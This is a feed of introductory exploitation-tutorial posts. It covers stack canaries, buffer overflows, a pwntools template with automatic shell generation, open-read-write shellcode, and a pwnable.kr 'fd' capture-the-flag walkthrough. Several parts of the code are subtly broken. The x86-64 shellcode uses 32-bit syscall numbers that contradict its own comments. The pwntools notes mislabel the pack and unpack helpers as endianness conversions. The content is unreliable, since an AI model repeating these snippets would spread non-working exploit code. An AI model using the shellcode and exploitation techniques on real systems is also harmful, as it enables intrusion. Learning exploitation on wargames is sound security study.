Forem: Hyunseung Ha

[PWN.05] What is Canary 🦜

Hyunseung Ha — Sun, 04 Dec 2022 22:30:00 +0000

Canary comes from a bird name called the Canary.
Canary is used for Protecting Stack buffer.

If we exploit RAO(Return Address Overwrite), We put a bunch of data into the buffer up to the return address.
so that we can exploit what we want to execute code.

BUT, What if there is a kind of Barrier like It is compromised when something is tampered with.
YES, The barrier is called the Canary.

mov rax,QWORD PTR fs:0x28
mov [rbp-0x8], rax

Process read a Canary value from fs:0x28.

mov rcx, QWORD PTR [rbp-0x8]
xor rcx, QWORD PTR fs:0x28
je CODE

If rcx, value of rbp-0x8, is same with fs:0x28, it means Canary hasn't been tampered with!

[PWN.04] Stack Buffer Overflow

Hyunseung Ha — Sun, 04 Dec 2022 14:06:11 +0000

What is Stack Buffer Overflow?
it occurs when data exceeding the buffer size of the stack is entered.

Buffer : where data is stored in
Overflow : exceeding

If the Buffer is in Stack, It is called as Stack Buffer.
If the Buffer is in Heap, It is called as Heap Buffer.

int main(int argc, char *argv[]){
    int overflowed = 0;
    char input[16];

    scanf("%s", input);

    if(overflowed) {
        printf("OVERFLOWED!!");
    } else
        printf("%s", input);
    return 0;
}

Stack Buffer layout is same with a following pic.

If we enter more than 15 digits of data into input, additional values will be stored in overflowed.
so It will output OVERFLOWED!!.

How to mitigate it ?
We can think about it.
First, we should check the size of input data.
Second, We can use the Canary!
Third, Enable ASLR(Address Space Layout Randomization)

And There are more methods to mitigate.

[PWN.03] Exploitation with pwntools

Hyunseung Ha — Sun, 13 Nov 2022 13:55:46 +0000

pwntools is a python tool used for exploitation.
We can use it and exploit easier than in the past.

#!/usr/bin/python
from pwn import *

# remote connection
r = remote("{IP}", PORT)

# Write payload to exploit
payload = ...

# Send data to {IP}
r.send(payload)
r.sendline(payload)
r.sendafter("{STRING FROM REMOTE}", payload)
r.sendlineafter("{STRING FROM REMOTE}", payload)

# Receive data from Remote
r.recv(int)
r.recvline()
r.recvuntil("{STRING}")
... and more

# Change to Little endian or Big Endian
# Little endian
hex(u32(VALUE))
hex(u64(VALUE))

# Big Endian
hex(p32(VALUE))
hex(p64(VALUE))

# for PLT(Procedure Linkage Table) and GOT(Global Offset 
Table)
e = ELF('{FILE}')
puts_plt = e.plt['puts']
read_got = e.got['read']

# Set architecture
context.arch = "amd64" # or i386, arm

# SHELL making AUTOMATICALLY
s = shellcraft.sh()

We can easily perform exploits using the above.

[PWN.02] Open Read Write

Hyunseung Ha — Sun, 23 Oct 2022 08:07:35 +0000

Open Read Write

We Open files and Read data from files, Write data into files.

In this section, We learn ORW to exploit and get shell command shell.

Following is ORW Syscall:

Firs, How to open file?:
file is /tmp/file
We have to Push the file path into Stack.
/tmp/file = 0x6c69662f706d742f65
The above hexadecimal value is written in little-endian basis.

push 0x65
mov rax, 0x6c69662f706d742f
push rax
mov rdi, rsp ; rdi is File name in this code.
xor rsi, rsi ; XOR for setting rsi to 0 means O_RDONLY
xor rdx, rdx ; There is no mode in Open file.
mov rax, 0x05 ; Open file is 0x02.
syscall ; open("/tmp/file", RD_ONLY, NULL)

Second How to read file?:
We can write how to read file with code similar to the above.

mov rdi, rax ; We will get fd(file descriptor)[] rax stored in .
mov rsi, rsp ; a variable for read is set.
sub rsi, 0x30 ; Set bufsize to 0x30.
mov rdx, 0x30 ; Data Length is 0x30
mov rax, 0x3 ; Read file is 0x00
syscall ; read(fd, buf, 0x30)

Finally, We already know how to write file:

mov rdi, 1 ; fd is set to STDOUT or File name.
mov rax, 0x4 ; Write file is 0x01.
syscall ; write(fd, buf, 0x30)

We use syscall to call kernel functions.
We can't use kernel functions in user mode in general. but we can call kernel function by System call.

There are many syscall to use so we can find it out more!
https://faculty.nps.edu/cseagle/assembly/sys_call.html

[pwnable.kr] fd writeup

Hyunseung Ha — Thu, 20 Oct 2022 16:19:15 +0000

ls -al
total 40
drwxr-x---   5 root   fd   4096 Oct 26  2016 .
drwxr-xr-x 116 root   root 4096 Nov 11  2021 ..
d---------   2 root   root 4096 Jun 12  2014 .bash_history
-r-sr-x---   1 fd_pwn fd   7322 Jun 11  2014 fd
-rw-r--r--   1 root   root  418 Jun 11  2014 fd.c
-r--r-----   1 fd_pwn root   50 Jun 11  2014 flag
-rw-------   1 root   root  128 Oct 26  2016 .gdb_history
dr-xr-xr-x   2 root   root 4096 Dec 19  2016 .irssi
drwxr-xr-x   2 root   root 4096 Oct 23  2016 .pwntools-cache

The file we want to read is a flag file, and only the fd_pwn owner or the root user can read the file.
BUT we are fd now.
So we should be the fd_pwn to gain proper permission.
fd has SetUID to fd_pwn. We can use it to gain access.

Look the source file up:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
    if(argc<2){
        printf("pass argv[1] a number\n");
        return 0;
    }
    int fd = atoi( argv[1] ) - 0x1234;
    int len = 0;
    len = read(fd, buf, 32);
    if(!strcmp("LETMEWIN\n", buf)){
        printf("good job :)\n");
        system("/bin/cat flag");
        exit(0);
    }
    printf("learn about Linux file IO\n");
    return 0;

}

We have to put an argument value, and if we put 0x1234 in the argument value, fd = 0 so that we can use standard input (keyboard) to input. After that we can set buf to LETMEWIN via standard input.
0x1234 is 4660 in decimal, so run following command to get the desired result:

./fd 4660
LETMEWIN
good job :)
_FLAG_

[pwnable.kr] Main

Hyunseung Ha — Thu, 20 Oct 2022 16:17:14 +0000

[PWN.01] Memory Layout

Hyunseung Ha — Thu, 20 Oct 2022 15:31:19 +0000

What is Memory Layout

If an attacker can maliciously manipulate memory, the manipulated memory value can cause the CPU to misbehave.
We call it Memory Corruption
Memory in Linux System is divided into 5 major Segments.

1. Code segment(Text Segment)

where Executable machine code is located in.
Code segment has READ and EXECUTE permission.

2. Data segment

Global variables and global constants whose values are set at compile time are located.
Data segment has READ permissions.
And This segment is divided into Two parts.

data segment : writable
rodata(read-only Data) segment : No writable

3. BSS segment (Block Started by Symbol)

Global variables whose values are not set at compile time are located.
The variables are set to Zero all

4. Heap segment(Lower → High)

Segment to store dynamically allocated data.
This segment has READ and WRITE permissions.

5. Stack segment(High → Lower)

Temporary variables such as function arguments or Local variables are stored here during execution.
Stack segment has READ and WRITE permissions.
This segment has Stack Frame which is created when a function is called and freed when the function returns.

[PWN.X] Series Main

Hyunseung Ha — Thu, 20 Oct 2022 12:44:19 +0000